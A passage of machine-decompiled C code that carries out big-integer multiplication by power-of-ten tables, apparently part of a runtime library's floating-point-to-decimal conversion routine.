                                                                            												_t1127 = _t1127 + 4;
                                                                            												__eflags = _t1127 - 8;
                                                                            												if(_t1127 != 8) {
                                                                            													continue;
                                                                            												} else {
                                                                            													_t1023 = _v1872 + 2;
                                                                            													_t1024 = _t1023 & 0x0000001f;
                                                                            													_t1128 = 0x20;
                                                                            													_t1129 = _t1128 - _t1024;
                                                                            													_v1888 = _t1024;
                                                                            													_t1268 = _t1023 >> 5;
                                                                            													_v1876 = _t1268;
                                                                            													_v1908 = _t1129;
                                                                            													_t1027 = E001ADDA0(1, _t1129, 0);
                                                                            													_v1896 = _v1896 & 0x00000000;
                                                                            													_t1028 = _t1027 - 1;
                                                                            													__eflags = _t1028;
                                                                            													asm("bsr ecx, edi");
                                                                            													_v1884 = _t1028;
                                                                            													_v1912 =  !_t1028;
                                                                            													if(_t1028 == 0) {
                                                                            														_t1130 = 0;
                                                                            														__eflags = 0;
                                                                            													} else {
                                                                            														_t1130 = _t1129 + 1;
                                                                            													}
                                                                            													_t1030 = 0x20;
                                                                            													_t1031 = _t1030 - _t1130;
                                                                            													_t1184 = _t1268 + 2;
                                                                            													__eflags = _v1888 - _t1031;
                                                                            													_v1880 = _t1184;
                                                                            													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
                                                                            													__eflags = _t1184 - 0x73;
                                                                            													_v1865 = _t1032;
                                                                            													_t1131 = _t1130 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
                                                                            													__eflags = _t1184 - 0x73;
                                                                            													if(_t1184 != 0x73) {
                                                                            														L28:
                                                                            														_t1033 = 0;
                                                                            														__eflags = 0;
                                                                            													} else {
                                                                            														__eflags = _t1032;
                                                                            														if(_t1032 == 0) {
                                                                            															goto L28;
                                                                            														} else {
                                                                            															_t1033 = 1;
                                                                            														}
                                                                            													}
                                                                            													__eflags = _t1131;
                                                                            													if(_t1131 != 0) {
                                                                            														L50:
                                                                            														__eflags = 0;
                                                                            														_t1064 = 0x1cc;
                                                                            														_v1400 = 0;
                                                                            														_v472 = 0;
                                                                            														E001BAA64( &_v468, 0x1cc,  &_v1396, 0);
                                                                            														_t1276 =  &(_t1276[4]);
                                                                            													} else {
                                                                            														__eflags = _t1033;
                                                                            														if(_t1033 != 0) {
                                                                            															goto L50;
                                                                            														} else {
                                                                            															_t1134 = 0x72;
                                                                            															__eflags = _t1184 - _t1134;
                                                                            															if(_t1184 >= _t1134) {
                                                                            																_t1184 = _t1134;
                                                                            																_v1880 = _t1134;
                                                                            															}
                                                                            															_t1135 = _t1184;
                                                                            															_v1892 = _t1135;
                                                                            															__eflags = _t1184 - 0xffffffff;
                                                                            															if(_t1184 != 0xffffffff) {
                                                                            																_t1185 = _v1876;
                                                                            																_t1270 = _t1184 - _t1185;
                                                                            																__eflags = _t1270;
                                                                            																_t1043 =  &_v468 + _t1270 * 4;
                                                                            																_v1872 = _t1043;
                                                                            																while(1) {
                                                                            																	__eflags = _t1135 - _t1185;
                                                                            																	if(_t1135 < _t1185) {
                                                                            																		break;
                                                                            																	}
                                                                            																	__eflags = _t1270 - _t1061;
                                                                            																	if(_t1270 >= _t1061) {
                                                                            																		_t1232 = 0;
                                                                            																		__eflags = 0;
                                                                            																	} else {
                                                                            																		_t1232 =  *_t1043;
                                                                            																	}
                                                                            																	__eflags = _t1270 - 1 - _t1061;
                                                                            																	if(_t1270 - 1 >= _t1061) {
                                                                            																		_t1045 = 0;
                                                                            																		__eflags = 0;
                                                                            																	} else {
                                                                            																		_t1045 =  *(_v1872 - 4);
                                                                            																	}
                                                                            																	_t1140 = _v1892;
                                                                            																	 *(_t1273 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1232 & _v1884) << _v1888;
                                                                            																	_t1135 = _t1140 - 1;
                                                                            																	_t1270 = _t1270 - 1;
                                                                            																	_t1043 = _v1872 - 4;
                                                                            																	_v1892 = _t1135;
                                                                            																	_v1872 = _t1043;
                                                                            																	__eflags = _t1135 - 0xffffffff;
                                                                            																	if(_t1135 != 0xffffffff) {
                                                                            																		_t1061 = _v472;
                                                                            																		continue;
                                                                            																	}
                                                                            																	break;
                                                                            																}
                                                                            																_t1184 = _v1880;
                                                                            																_t1268 = _v1876;
                                                                            															}
                                                                            															__eflags = _t1268;
                                                                            															if(_t1268 != 0) {
                                                                            																__eflags = 0;
                                                                            																memset( &_v468, 0, _t1268 << 2);
                                                                            																_t1276 =  &(_t1276[3]);
                                                                            															}
                                                                            															__eflags = _v1865;
                                                                            															_t1064 = 0x1cc;
                                                                            															if(_v1865 == 0) {
                                                                            																_v472 = _t1184;
                                                                            															} else {
                                                                            																_v472 = _t1184 + 1;
                                                                            															}
                                                                            														}
                                                                            													}
                                                                            													_v1392 = _v1392 & 0x00000000;
                                                                            													_t1038 = 4;
                                                                            													__eflags = 1;
                                                                            													_v1396 = _t1038;
                                                                            													_v1400 = 1;
                                                                            													_v936 = 1;
                                                                            													_push(_t1038);
                                                                            												}
                                                                            												goto L52;
                                                                            											}
                                                                            											goto L53;
                                                                            										}
                                                                            										L52:
                                                                            										_push( &_v1396);
                                                                            										_push(_t1064);
                                                                            										_push( &_v932);
                                                                            										E001BAA64();
                                                                            										_t1279 =  &(_t1276[4]);
                                                                            									}
                                                                            									_t810 = _v1904;
                                                                            									_t1084 = 0xa;
                                                                            									_v1912 = _t1084;
                                                                            									__eflags = _t810;
                                                                            									if(_t810 < 0) {
                                                                            										_t811 =  ~_t810;
                                                                            										_t812 = _t811 / _t1084;
                                                                            										_v1880 = _t812;
                                                                            										_t1085 = _t811 % _t1084;
                                                                            										_v1884 = _t1085;
                                                                            										__eflags = _t812;
                                                                            										if(_t812 == 0) {
                                                                            											L249:
                                                                            											__eflags = _t1085;
                                                                            											if(_t1085 != 0) {
                                                                            												_t849 =  *(0x1c6a9c + _t1085 * 4);
                                                                            												_v1896 = _t849;
                                                                            												__eflags = _t849;
                                                                            												if(_t849 == 0) {
                                                                            													L260:
                                                                            													__eflags = 0;
                                                                            													_push(0);
                                                                            													_v472 = 0;
                                                                            													_v2408 = 0;
                                                                            													goto L261;
                                                                            												} else {
                                                                            													__eflags = _t849 - 1;
                                                                            													if(_t849 != 1) {
                                                                            														_t1096 = _v472;
                                                                            														__eflags = _t1096;
                                                                            														if(_t1096 != 0) {
                                                                            															_t1201 = 0;
                                                                            															_t1250 = 0;
                                                                            															__eflags = 0;
                                                                            															do {
                                                                            																_t1155 = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) >> 0x20;
                                                                            																 *(_t1273 + _t1250 * 4 - 0x1d0) = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) + _t1201;
                                                                            																_t849 = _v1896;
                                                                            																asm("adc edx, 0x0");
                                                                            																_t1250 = _t1250 + 1;
                                                                            																_t1201 = _t1155;
                                                                            																__eflags = _t1250 - _t1096;
                                                                            															} while (_t1250 != _t1096);
                                                                            															__eflags = _t1201;
                                                                            															if(_t1201 != 0) {
                                                                            																_t856 = _v472;
                                                                            																__eflags = _t856 - 0x73;
                                                                            																if(_t856 >= 0x73) {
                                                                            																	goto L260;
                                                                            																} else {
                                                                            																	 *(_t1273 + _t856 * 4 - 0x1d0) = _t1201;
                                                                            																	_v472 = _v472 + 1;
                                                                            																}
                                                                            															}
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            										} else {
                                                                            											do {
                                                                            												__eflags = _t812 - 0x26;
                                                                            												if(_t812 > 0x26) {
                                                                            													_t812 = 0x26;
                                                                            												}
                                                                            												_t1097 =  *(0x1c6a06 + _t812 * 4) & 0x000000ff;
                                                                            												_v1872 = _t812;
                                                                            												_v1400 = ( *(0x1c6a06 + _t812 * 4) & 0x000000ff) + ( *(0x1c6a07 + _t812 * 4) & 0x000000ff);
                                                                            												E001AE920(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
                                                                            												_t867 = E001AEA80( &(( &_v1396)[_t1097]), 0x1c6100 + ( *(0x1c6a04 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x1c6a07 + _t812 * 4) & 0x000000ff) << 2);
                                                                            												_t1098 = _v1400;
                                                                            												_t1279 =  &(_t1279[6]);
                                                                            												_v1892 = _t1098;
                                                                            												__eflags = _t1098 - 1;
                                                                            												if(_t1098 > 1) {
                                                                            													__eflags = _v472 - 1;
                                                                            													if(_v472 > 1) {
                                                                            														__eflags = _t1098 - _v472;
                                                                            														_t1204 =  &_v1396;
                                                                            														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
                                                                            														__eflags = _t868;
                                                                            														if(_t868 != 0) {
                                                                            															_t1156 =  &_v468;
                                                                            														} else {
                                                                            															_t1204 =  &_v468;
                                                                            															_t1156 =  &_v1396;
                                                                            														}
                                                                            														_v1908 = _t1156;
                                                                            														__eflags = _t868;
                                                                            														if(_t868 == 0) {
                                                                            															_t1098 = _v472;
                                                                            														}
                                                                            														_v1876 = _t1098;
                                                                            														__eflags = _t868;
                                                                            														if(_t868 != 0) {
                                                                            															_v1892 = _v472;
                                                                            														}
                                                                            														_t1157 = 0;
                                                                            														_t1252 = 0;
                                                                            														_v1864 = 0;
                                                                            														__eflags = _t1098;
                                                                            														if(_t1098 == 0) {
                                                                            															L243:
                                                                            															_v472 = _t1157;
                                                                            															_t870 = _t1157 << 2;
                                                                            															__eflags = _t870;
                                                                            															_push(_t870);
                                                                            															_t871 =  &_v1860;
                                                                            															goto L244;
                                                                            														} else {
                                                                            															_t1205 = _t1204 -  &_v1860;
                                                                            															__eflags = _t1205;
                                                                            															_v1928 = _t1205;
                                                                            															do {
                                                                            																_t878 =  *(_t1273 + _t1205 + _t1252 * 4 - 0x740);
                                                                            																_v1896 = _t878;
                                                                            																__eflags = _t878;
                                                                            																if(_t878 != 0) {
                                                                            																	_t879 = 0;
                                                                            																	_t1206 = 0;
                                                                            																	_t1099 = _t1252;
                                                                            																	_v1888 = 0;
                                                                            																	__eflags = _v1892;
                                                                            																	if(_v1892 == 0) {
                                                                            																		L240:
                                                                            																		__eflags = _t1099 - 0x73;
                                                                            																		if(_t1099 == 0x73) {
                                                                            																			goto L258;
                                                                            																		} else {
                                                                            																			_t1205 = _v1928;
                                                                            																			_t1098 = _v1876;
                                                                            																			goto L242;
                                                                            																		}
                                                                            																	} else {
                                                                            																		while(1) {
                                                                            																			__eflags = _t1099 - 0x73;
                                                                            																			if(_t1099 == 0x73) {
                                                                            																				goto L235;
                                                                            																			}
                                                                            																			__eflags = _t1099 - _t1157;
                                                                            																			if(_t1099 == _t1157) {
                                                                            																				 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
                                                                            																				_t891 = _t879 + 1 + _t1252;
                                                                            																				__eflags = _t891;
                                                                            																				_v1864 = _t891;
                                                                            																				_t879 = _v1888;
                                                                            																			}
                                                                            																			_t886 =  *(_v1908 + _t879 * 4);
                                                                            																			asm("adc edx, 0x0");
                                                                            																			 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1206;
                                                                            																			asm("adc edx, 0x0");
                                                                            																			_t879 = _v1888 + 1;
                                                                            																			_t1099 = _t1099 + 1;
                                                                            																			_v1888 = _t879;
                                                                            																			_t1206 = _t886 * _v1896 >> 0x20;
                                                                            																			_t1157 = _v1864;
                                                                            																			__eflags = _t879 - _v1892;
                                                                            																			if(_t879 != _v1892) {
                                                                            																				continue;
                                                                            																			} else {
                                                                            																				goto L235;
                                                                            																			}
                                                                            																			while(1) {
                                                                            																				L235:
                                                                            																				__eflags = _t1206;
                                                                            																				if(_t1206 == 0) {
                                                                            																					goto L240;
                                                                            																				}
                                                                            																				__eflags = _t1099 - 0x73;
                                                                            																				if(_t1099 == 0x73) {
                                                                            																					goto L258;
                                                                            																				} else {
                                                                            																					__eflags = _t1099 - _t1157;
                                                                            																					if(_t1099 == _t1157) {
                                                                            																						_t558 = _t1273 + _t1099 * 4 - 0x740;
                                                                            																						 *_t558 =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
                                                                            																						__eflags =  *_t558;
                                                                            																						_t564 = _t1099 + 1; // 0x1
                                                                            																						_v1864 = _t564;
                                                                            																					}
                                                                            																					_t884 = _t1206;
                                                                            																					_t1206 = 0;
                                                                            																					 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t884;
                                                                            																					_t1157 = _v1864;
                                                                            																					asm("adc edi, edi");
                                                                            																					_t1099 = _t1099 + 1;
                                                                            																					continue;
                                                                            																				}
                                                                            																				goto L246;
                                                                            																			}
                                                                            																			goto L240;
                                                                            																		}
                                                                            																		goto L235;
                                                                            																	}
                                                                            																} else {
                                                                            																	__eflags = _t1252 - _t1157;
                                                                            																	if(_t1252 == _t1157) {
                                                                            																		 *(_t1273 + _t1252 * 4 - 0x740) =  *(_t1273 + _t1252 * 4 - 0x740) & _t878;
                                                                            																		_t526 = _t1252 + 1; // 0x1
                                                                            																		_t1157 = _t526;
                                                                            																		_v1864 = _t1157;
                                                                            																	}
                                                                            																	goto L242;
                                                                            																}
                                                                            																goto L246;
                                                                            																L242:
                                                                            																_t1252 = _t1252 + 1;
                                                                            																__eflags = _t1252 - _t1098;
                                                                            															} while (_t1252 != _t1098);
                                                                            															goto L243;
                                                                            														}
                                                                            													} else {
                                                                            														_t1207 = _v468;
                                                                            														_v472 = _t1098;
                                                                            														E001BAA64( &_v468, _t1064,  &_v1396, _t1098 << 2);
                                                                            														_t1279 =  &(_t1279[4]);
                                                                            														__eflags = _t1207;
                                                                            														if(_t1207 == 0) {
                                                                            															goto L203;
                                                                            														} else {
                                                                            															__eflags = _t1207 - 1;
                                                                            															if(_t1207 == 1) {
                                                                            																goto L245;
                                                                            															} else {
                                                                            																__eflags = _v472;
                                                                            																if(_v472 == 0) {
                                                                            																	goto L245;
                                                                            																} else {
                                                                            																	_t1100 = 0;
                                                                            																	_v1896 = _v472;
                                                                            																	_t1253 = 0;
                                                                            																	__eflags = 0;
                                                                            																	do {
                                                                            																		_t900 = _t1207;
                                                                            																		_t1158 = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) >> 0x20;
                                                                            																		 *(_t1273 + _t1253 * 4 - 0x1d0) = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) + _t1100;
                                                                            																		asm("adc edx, 0x0");
                                                                            																		_t1253 = _t1253 + 1;
                                                                            																		_t1100 = _t1158;
                                                                            																		__eflags = _t1253 - _v1896;
                                                                            																	} while (_t1253 != _v1896);
                                                                            																	goto L208;
                                                                            																}
                                                                            															}
                                                                            														}
                                                                            													}
                                                                            												} else {
                                                                            													_t1208 = _v1396;
                                                                            													__eflags = _t1208;
                                                                            													if(_t1208 != 0) {
                                                                            														__eflags = _t1208 - 1;
                                                                            														if(_t1208 == 1) {
                                                                            															goto L245;
                                                                            														} else {
                                                                            															__eflags = _v472;
                                                                            															if(_v472 == 0) {
                                                                            																goto L245;
                                                                            															} else {
                                                                            																_t1101 = 0;
                                                                            																_v1896 = _v472;
                                                                            																_t1254 = 0;
                                                                            																__eflags = 0;
                                                                            																do {
                                                                            																	_t905 = _t1208;
                                                                            																	_t1159 = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) >> 0x20;
                                                                            																	 *(_t1273 + _t1254 * 4 - 0x1d0) = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) + _t1101;
                                                                            																	asm("adc edx, 0x0");
                                                                            																	_t1254 = _t1254 + 1;
                                                                            																	_t1101 = _t1159;
                                                                            																	__eflags = _t1254 - _v1896;
                                                                            																} while (_t1254 != _v1896);
                                                                            																L208:
                                                                            																__eflags = _t1100;
                                                                            																if(_t1100 == 0) {
                                                                            																	goto L245;
                                                                            																} else {
                                                                            																	_t903 = _v472;
                                                                            																	__eflags = _t903 - 0x73;
                                                                            																	if(_t903 >= 0x73) {
                                                                            																		L258:
                                                                            																		_v2408 = 0;
                                                                            																		_v472 = 0;
                                                                            																		E001BAA64( &_v468, _t1064,  &_v2404, 0);
                                                                            																		_t1279 =  &(_t1279[4]);
                                                                            																		_t874 = 0;
                                                                            																	} else {
                                                                            																		 *(_t1273 + _t903 * 4 - 0x1d0) = _t1100;
                                                                            																		_v472 = _v472 + 1;
                                                                            																		goto L245;
                                                                            																	}
                                                                            																}
                                                                            															}
                                                                            														}
                                                                            													} else {
                                                                            														L203:
                                                                            														_v2408 = 0;
                                                                            														_v472 = 0;
                                                                            														_push(0);
                                                                            														_t871 =  &_v2404;
                                                                            														L244:
                                                                            														_push(_t871);
                                                                            														_push(_t1064);
                                                                            														_push( &_v468);
                                                                            														E001BAA64();
                                                                            														_t1279 =  &(_t1279[4]);
                                                                            														L245:
                                                                            														_t874 = 1;
                                                                            													}
                                                                            												}
                                                                            												L246:
                                                                            												__eflags = _t874;
                                                                            												if(_t874 == 0) {
                                                                            													_v2408 = _v2408 & 0x00000000;
                                                                            													_v472 = _v472 & 0x00000000;
                                                                            													_push(0);
                                                                            													L261:
                                                                            													_push( &_v2404);
                                                                            													_t852 =  &_v468;
                                                                            													goto L262;
                                                                            												} else {
                                                                            													goto L247;
                                                                            												}
                                                                            												goto L263;
                                                                            												L247:
                                                                            												_t812 = _v1880 - _v1872;
                                                                            												__eflags = _t812;
                                                                            												_v1880 = _t812;
                                                                            											} while (_t812 != 0);
                                                                            											_t1085 = _v1884;
                                                                            											goto L249;
                                                                            										}
                                                                            									} else {
                                                                            										_t908 = _t810 / _t1084;
                                                                            										_v1908 = _t908;
                                                                            										_t1102 = _t810 % _t1084;
                                                                            										_v1896 = _t1102;
                                                                            										__eflags = _t908;
                                                                            										if(_t908 == 0) {
                                                                            											L184:
                                                                            											__eflags = _t1102;
                                                                            											if(_t1102 != 0) {
                                                                            												_t1209 =  *(0x1c6a9c + _t1102 * 4);
                                                                            												__eflags = _t1209;
                                                                            												if(_t1209 != 0) {
                                                                            													__eflags = _t1209 - 1;
                                                                            													if(_t1209 != 1) {
                                                                            														_t909 = _v936;
                                                                            														_v1896 = _t909;
                                                                            														__eflags = _t909;
                                                                            														if(_t909 != 0) {
                                                                            															_t1255 = 0;
                                                                            															_t1103 = 0;
                                                                            															__eflags = 0;
                                                                            															do {
                                                                            																_t910 = _t1209;
                                                                            																_t1163 = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) >> 0x20;
                                                                            																 *(_t1273 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) + _t1255;
                                                                            																asm("adc edx, 0x0");
                                                                            																_t1103 = _t1103 + 1;
                                                                            																_t1255 = _t1163;
                                                                            																__eflags = _t1103 - _v1896;
                                                                            															} while (_t1103 != _v1896);
                                                                            															__eflags = _t1255;
                                                                            															if(_t1255 != 0) {
                                                                            																_t913 = _v936;
                                                                            																__eflags = _t913 - 0x73;
                                                                            																if(_t913 >= 0x73) {
                                                                            																	goto L186;
                                                                            																} else {
                                                                            																	 *(_t1273 + _t913 * 4 - 0x3a0) = _t1255;
                                                                            																	_v936 = _v936 + 1;
                                                                            																}
                                                                            															}
                                                                            														}
                                                                            													}
                                                                            												} else {
                                                                            													L186:
                                                                            													_v2408 = 0;
                                                                            													_v936 = 0;
                                                                            													_push(0);
                                                                            													goto L190;
                                                                            												}
                                                                            											}
                                                                            										} else {
                                                                            											do {
                                                                            												__eflags = _t908 - 0x26;
                                                                            												if(_t908 > 0x26) {
                                                                            													_t908 = 0x26;
                                                                            												}
                                                                            												_t1104 =  *(0x1c6a06 + _t908 * 4) & 0x000000ff;
                                                                            												_v1888 = _t908;
                                                                            												_v1400 = ( *(0x1c6a06 + _t908 * 4) & 0x000000ff) + ( *(0x1c6a07 + _t908 * 4) & 0x000000ff);
                                                                            												E001AE920(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
                                                                            												_t926 = E001AEA80( &(( &_v1396)[_t1104]), 0x1c6100 + ( *(0x1c6a04 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x1c6a07 + _t908 * 4) & 0x000000ff) << 2);
                                                                            												_t1105 = _v1400;
                                                                            												_t1279 =  &(_t1279[6]);
                                                                            												_v1892 = _t1105;
                                                                            												__eflags = _t1105 - 1;
                                                                            												if(_t1105 > 1) {
                                                                            													__eflags = _v936 - 1;
                                                                            													if(_v936 > 1) {
                                                                            														__eflags = _t1105 - _v936;
                                                                            														_t1212 =  &_v1396;
                                                                            														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
                                                                            														__eflags = _t927;
                                                                            														if(_t927 != 0) {
                                                                            															_t1164 =  &_v932;
                                                                            														} else {
                                                                            															_t1212 =  &_v932;
                                                                            															_t1164 =  &_v1396;
                                                                            														}
                                                                            														_v1876 = _t1164;
                                                                            														__eflags = _t927;
                                                                            														if(_t927 == 0) {
                                                                            															_t1105 = _v936;
                                                                            														}
                                                                            														_v1880 = _t1105;
                                                                            														__eflags = _t927;
                                                                            														if(_t927 != 0) {
                                                                            															_v1892 = _v936;
                                                                            														}
                                                                            														_t1165 = 0;
                                                                            														_t1257 = 0;
                                                                            														_v1864 = 0;
                                                                            														__eflags = _t1105;
                                                                            														if(_t1105 == 0) {
                                                                            															L177:
                                                                            															_v936 = _t1165;
                                                                            															_t929 = _t1165 << 2;
                                                                            															__eflags = _t929;
                                                                            															goto L178;
                                                                            														} else {
                                                                            															_t1213 = _t1212 -  &_v1860;
                                                                            															__eflags = _t1213;
                                                                            															_v1928 = _t1213;
                                                                            															do {
                                                                            																_t937 =  *(_t1273 + _t1213 + _t1257 * 4 - 0x740);
                                                                            																_v1884 = _t937;
                                                                            																__eflags = _t937;
                                                                            																if(_t937 != 0) {
                                                                            																	_t938 = 0;
                                                                            																	_t1214 = 0;
                                                                            																	_t1106 = _t1257;
                                                                            																	_v1872 = 0;
                                                                            																	__eflags = _v1892;
                                                                            																	if(_v1892 == 0) {
                                                                            																		L174:
                                                                            																		__eflags = _t1106 - 0x73;
                                                                            																		if(_t1106 == 0x73) {
                                                                            																			goto L187;
                                                                            																		} else {
                                                                            																			_t1213 = _v1928;
                                                                            																			_t1105 = _v1880;
                                                                            																			goto L176;
                                                                            																		}
                                                                            																	} else {
                                                                            																		while(1) {
                                                                            																			__eflags = _t1106 - 0x73;
                                                                            																			if(_t1106 == 0x73) {
                                                                            																				goto L169;
                                                                            																			}
                                                                            																			__eflags = _t1106 - _t1165;
                                                                            																			if(_t1106 == _t1165) {
                                                                            																				 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
                                                                            																				_t950 = _t938 + 1 + _t1257;
                                                                            																				__eflags = _t950;
                                                                            																				_v1864 = _t950;
                                                                            																				_t938 = _v1872;
                                                                            																			}
                                                                            																			_t945 =  *(_v1876 + _t938 * 4);
                                                                            																			asm("adc edx, 0x0");
                                                                            																			 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1214;
                                                                            																			asm("adc edx, 0x0");
                                                                            																			_t938 = _v1872 + 1;
                                                                            																			_t1106 = _t1106 + 1;
                                                                            																			_v1872 = _t938;
                                                                            																			_t1214 = _t945 * _v1884 >> 0x20;
                                                                            																			_t1165 = _v1864;
                                                                            																			__eflags = _t938 - _v1892;
                                                                            																			if(_t938 != _v1892) {
                                                                            																				continue;
                                                                            																			} else {
                                                                            																				goto L169;
                                                                            																			}
                                                                            																			while(1) {
                                                                            																				L169:
                                                                            																				__eflags = _t1214;
                                                                            																				if(_t1214 == 0) {
                                                                            																					goto L174;
                                                                            																				}
                                                                            																				__eflags = _t1106 - 0x73;
                                                                            																				if(_t1106 == 0x73) {
                                                                            																					L187:
                                                                            																					__eflags = 0;
                                                                            																					_v2408 = 0;
                                                                            																					_v936 = 0;
                                                                            																					_push(0);
                                                                            																					_t940 =  &_v2404;
                                                                            																					goto L188;
                                                                            																				} else {
                                                                            																					__eflags = _t1106 - _t1165;
                                                                            																					if(_t1106 == _t1165) {
                                                                            																						_t370 = _t1273 + _t1106 * 4 - 0x740;
                                                                            																						 *_t370 =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
                                                                            																						__eflags =  *_t370;
                                                                            																						_t376 = _t1106 + 1; // 0x1
                                                                            																						_v1864 = _t376;
                                                                            																					}
                                                                            																					_t943 = _t1214;
                                                                            																					_t1214 = 0;
                                                                            																					 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t943;
                                                                            																					_t1165 = _v1864;
                                                                            																					asm("adc edi, edi");
                                                                            																					_t1106 = _t1106 + 1;
                                                                            																					continue;
                                                                            																				}
                                                                            																				goto L181;
                                                                            																			}
                                                                            																			goto L174;
                                                                            																		}
                                                                            																		goto L169;
                                                                            																	}
                                                                            																} else {
                                                                            																	__eflags = _t1257 - _t1165;
                                                                            																	if(_t1257 == _t1165) {
                                                                            																		 *(_t1273 + _t1257 * 4 - 0x740) =  *(_t1273 + _t1257 * 4 - 0x740) & _t937;
                                                                            																		_t338 = _t1257 + 1; // 0x1
                                                                            																		_t1165 = _t338;
                                                                            																		_v1864 = _t1165;
                                                                            																	}
                                                                            																	goto L176;
                                                                            																}
                                                                            																goto L181;
                                                                            																L176:
                                                                            																_t1257 = _t1257 + 1;
                                                                            																__eflags = _t1257 - _t1105;
                                                                            															} while (_t1257 != _t1105);
                                                                            															goto L177;
                                                                            														}
                                                                            													} else {
                                                                            														_t1215 = _v932;
                                                                            														_v936 = _t1105;
                                                                            														E001BAA64( &_v932, _t1064,  &_v1396, _t1105 << 2);
                                                                            														_t1279 =  &(_t1279[4]);
                                                                            														__eflags = _t1215;
                                                                            														if(_t1215 != 0) {
                                                                            															__eflags = _t1215 - 1;
                                                                            															if(_t1215 == 1) {
                                                                            																goto L180;
                                                                            															} else {
                                                                            																__eflags = _v936;
                                                                            																if(_v936 == 0) {
                                                                            																	goto L180;
                                                                            																} else {
                                                                            																	_t1107 = 0;
                                                                            																	_v1884 = _v936;
                                                                            																	_t1258 = 0;
                                                                            																	__eflags = 0;
                                                                            																	do {
                                                                            																		_t958 = _t1215;
                                                                            																		_t1166 = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) >> 0x20;
                                                                            																		 *(_t1273 + _t1258 * 4 - 0x3a0) = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) + _t1107;
                                                                            																		asm("adc edx, 0x0");
                                                                            																		_t1258 = _t1258 + 1;
                                                                            																		_t1107 = _t1166;
                                                                            																		__eflags = _t1258 - _v1884;
                                                                            																	} while (_t1258 != _v1884);
                                                                            																	goto L149;
                                                                            																}
                                                                            															}
                                                                            														} else {
                                                                            															_v1400 = 0;
                                                                            															_v936 = 0;
                                                                            															_push(0);
                                                                            															_t930 =  &_v1396;
                                                                            															goto L179;
                                                                            														}
                                                                            													}
                                                                            												} else {
                                                                            													_t1216 = _v1396;
                                                                            													__eflags = _t1216;
                                                                            													if(_t1216 != 0) {
                                                                            														__eflags = _t1216 - 1;
                                                                            														if(_t1216 == 1) {
                                                                            															goto L180;
                                                                            														} else {
                                                                            															__eflags = _v936;
                                                                            															if(_v936 == 0) {
                                                                            																goto L180;
                                                                            															} else {
                                                                            																_t1108 = 0;
                                                                            																_v1884 = _v936;
                                                                            																_t1259 = 0;
                                                                            																__eflags = 0;
                                                                            																do {
                                                                            																	_t965 = _t1216;
                                                                            																	_t1167 = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) >> 0x20;
                                                                            																	 *(_t1273 + _t1259 * 4 - 0x3a0) = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) + _t1108;
                                                                            																	asm("adc edx, 0x0");
                                                                            																	_t1259 = _t1259 + 1;
                                                                            																	_t1108 = _t1167;
                                                                            																	__eflags = _t1259 - _v1884;
                                                                            																} while (_t1259 != _v1884);
                                                                            																L149:
                                                                            																__eflags = _t1107;
                                                                            																if(_t1107 == 0) {
                                                                            																	goto L180;
                                                                            																} else {
                                                                            																	_t961 = _v936;
                                                                            																	__eflags = _t961 - 0x73;
                                                                            																	if(_t961 < 0x73) {
                                                                            																		 *(_t1273 + _t961 * 4 - 0x3a0) = _t1107;
                                                                            																		_v936 = _v936 + 1;
                                                                            																		goto L180;
                                                                            																	} else {
                                                                            																		_v1400 = 0;
                                                                            																		_v936 = 0;
                                                                            																		_push(0);
                                                                            																		_t940 =  &_v1396;
                                                                            																		L188:
                                                                            																		_push(_t940);
                                                                            																		_push(_t1064);
                                                                            																		_push( &_v932);
                                                                            																		E001BAA64();
                                                                            																		_t1279 =  &(_t1279[4]);
                                                                            																		_t933 = 0;
                                                                            																	}
                                                                            																}
                                                                            															}
                                                                            														}
                                                                            													} else {
                                                                            														_t929 = 0;
                                                                            														_v1864 = 0;
                                                                            														_v936 = 0;
                                                                            														L178:
                                                                            														_push(_t929);
                                                                            														_t930 =  &_v1860;
                                                                            														L179:
                                                                            														_push(_t930);
                                                                            														_push(_t1064);
                                                                            														_push( &_v932);
                                                                            														E001BAA64();
                                                                            														_t1279 =  &(_t1279[4]);
                                                                            														L180:
                                                                            														_t933 = 1;
                                                                            													}
                                                                            												}
                                                                            												L181:
                                                                            												__eflags = _t933;
                                                                            												if(_t933 == 0) {
                                                                            													_v2408 = _v2408 & 0x00000000;
                                                                            													_t404 =  &_v936;
                                                                            													 *_t404 = _v936 & 0x00000000;
                                                                            													__eflags =  *_t404;
                                                                            													_push(0);
                                                                            													L190:
                                                                            													_push( &_v2404);
                                                                            													_t852 =  &_v932;
                                                                            													L262:
                                                                            													_push(_t1064);
                                                                            													_push(_t852);
                                                                            													E001BAA64();
